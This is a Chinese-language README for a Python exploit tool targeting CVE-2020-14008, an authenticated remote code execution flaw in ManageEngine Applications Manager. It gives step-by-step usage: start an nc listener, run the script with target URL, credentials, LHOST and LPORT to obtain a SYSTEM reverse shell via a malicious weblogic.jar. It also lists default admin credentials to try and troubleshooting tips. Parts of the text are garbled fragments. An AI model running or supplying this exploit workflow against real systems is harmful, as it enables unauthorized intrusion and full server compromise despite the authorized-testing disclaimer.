
CVE-2020-14008 - ManageEngine Applications Manager 远程代码执行
Zoho ManageEngine Applications Manager(版本 <= 14720)中的认证远程代码执行漏洞,通过任意文件上传实现。
| 细节 | 值 |
|---|---|
| CVE | CVE-2020-14008 |
| CVSS | 7.2 (高危) |
| 类型 | 认证RCE / 任意文件上传 |
| 产品 | Zoho ManageEngine Applications Manager |
| 受影响版本 | 14720及以下版本 |
| 要求 | 有效的管理员凭据 |
| 结果 | SYSTEM级反向Shell |
该漏洞利用Weblogic监控凭据测试功能。认证管理员将恶意 weblogic.jar 文件上传到预期的Weblogic库路径。当触发凭据测试时,ManageEngine通过 JarLoader.loadClass() 和 newInstance() 从上传的JAR中加载 weblogic.jndi.Environment,从而执行任意Java代码。
javac 和 jar 在PATH中)nc(netcat)用于接收反向Shellpip3 install requests urllib3 lxml
nc -lvnp 1337
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>
# 基础用法
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337
weblogic.jndi.Environment)到 weblogic.jarclasses/weblogic/version8/(备用方案:创建计划任务移动它)/testCredential.do 上的Weblogic凭据测试,加载并实例化恶意类| 用户名 | 密码 |
|---|---|
| admin | admin |
| admin | password |
| administrator | administrator |
| guest | guest |
本工具仅用于授权的渗透测试和安全研究。针对您未拥有或未获许可测试的系统进行未经授权使用是违法的。
| 错误 | 修复 |
|---|
release version 7 not supported | Java 21+ 已放弃Java 7目标。脚本使用 --release 8 |
FileNotFoundError: weblogic.jar | JAR编译失败。请确保 javac 和 jar 在PATH中 |
No valid response from used session | 凭据无效 |
Actionname not found | 任务创建失败,请检查管理员权限 |